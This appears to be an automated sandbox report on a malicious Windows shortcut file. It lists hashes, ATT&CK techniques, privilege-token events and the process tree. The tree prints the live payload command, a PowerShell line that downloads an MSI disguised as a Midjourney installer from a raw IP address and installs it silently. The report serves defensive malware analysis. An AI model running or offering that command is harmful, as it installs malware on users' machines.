106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
03-10-2024 08:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

03102024_0819_Report-41952.lnk
Size

3KB
MD5

2aed3939fbf8f1967d68fcc746771889
SHA1

eb04819a97ca2cf33211c6ea323a9c77cdfacfcf
SHA256

106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f
SHA512

0d45000b7a470655668e5c0c95aaab3911b75b3f4163abb02f9b6e987e070ad02af144d5f791ebf6940c5c838f35ff55f7c0b906ade62f47dde6ad9ff1750b1c

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeShutdownPrivilege	2552	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2552	msiexec.exe
Token: SeRestorePrivilege	2000	msiexec.exe
Token: SeTakeOwnershipPrivilege	2000	msiexec.exe
Token: SeSecurityPrivilege	2000	msiexec.exe
Token: SeCreateTokenPrivilege	2552	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2552	msiexec.exe
Token: SeLockMemoryPrivilege	2552	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2552	msiexec.exe
Token: SeMachineAccountPrivilege	2552	msiexec.exe
Token: SeTcbPrivilege	2552	msiexec.exe
Token: SeSecurityPrivilege	2552	msiexec.exe
Token: SeTakeOwnershipPrivilege	2552	msiexec.exe
Token: SeLoadDriverPrivilege	2552	msiexec.exe
Token: SeSystemProfilePrivilege	2552	msiexec.exe
Token: SeSystemtimePrivilege	2552	msiexec.exe
Token: SeProfSingleProcessPrivilege	2552	msiexec.exe
Token: SeIncBasePriorityPrivilege	2552	msiexec.exe
Token: SeCreatePagefilePrivilege	2552	msiexec.exe
Token: SeCreatePermanentPrivilege	2552	msiexec.exe
Token: SeBackupPrivilege	2552	msiexec.exe
Token: SeRestorePrivilege	2552	msiexec.exe
Token: SeShutdownPrivilege	2552	msiexec.exe
Token: SeDebugPrivilege	2552	msiexec.exe
Token: SeAuditPrivilege	2552	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2552	msiexec.exe
Token: SeChangeNotifyPrivilege	2552	msiexec.exe
Token: SeRemoteShutdownPrivilege	2552	msiexec.exe
Token: SeUndockPrivilege	2552	msiexec.exe
Token: SeSyncAgentPrivilege	2552	msiexec.exe
Token: SeEnableDelegationPrivilege	2552	msiexec.exe
Token: SeManageVolumePrivilege	2552	msiexec.exe
Token: SeImpersonatePrivilege	2552	msiexec.exe
Token: SeCreateGlobalPrivilege	2552	msiexec.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 2796	1924	cmd.exe	31
PID 1924 wrote to memory of 2796	1924	cmd.exe	31
PID 1924 wrote to memory of 2796	1924	cmd.exe	31
PID 2796 wrote to memory of 2552	2796	powershell.exe	32
PID 2796 wrote to memory of 2552	2796	powershell.exe	32
PID 2796 wrote to memory of 2552	2796	powershell.exe	32
PID 2796 wrote to memory of 2552	2796	powershell.exe	32
PID 2796 wrote to memory of 2552	2796	powershell.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\03102024_0819_Report-41952.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://193.242.145.138/mid/w1/Midjourney.msi" -OutFile "C:\Users\Admin\AppData\Roaming\y.msi";msiexec /i C:\Users\Admin\AppData\Roaming\y.msi /qn
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\system32\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Roaming\y.msi /qn
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2552

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2796-38-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmp

Filesize
4KB

Download
memory/2796-39-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/2796-40-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/2796-44-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-42-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-41-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-43-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-45-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-46-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp

Filesize
9.6MB

Download